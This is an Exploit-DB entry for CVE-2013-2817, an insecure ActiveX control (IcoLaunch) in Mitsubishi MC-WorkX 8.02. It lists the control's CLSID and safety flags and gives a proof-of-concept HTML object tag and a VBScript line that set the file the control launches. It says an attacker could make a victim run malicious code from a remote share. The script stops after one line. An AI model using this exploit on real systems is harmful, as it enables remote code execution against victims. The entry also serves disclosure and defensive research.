Mitsubishi MC-WorkX 8.02 - ActiveX Control IcoLaunch File Execution

ID EDB-ID:28284
Type exploitdb
Reporter blake
Modified 2013-09-15T00:00:00


Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution. CVE-2013-2817. Remote exploit for windows platform

<object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object>
Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll
Version: MC-WorkX 8.02
Tested on: Windows XP SP3 / IE 6
Author: Blake

CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D
ProgId: ICOLAUNCHLib.LaunchCtl
Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll
MemberName: FileName
Safe for scripting: True
Safe for init: True
Kill Bit: False

<title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title>
<p>This proof of concept will launch an arbritrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</p>

<script language='vbscript'>
target.FileName = file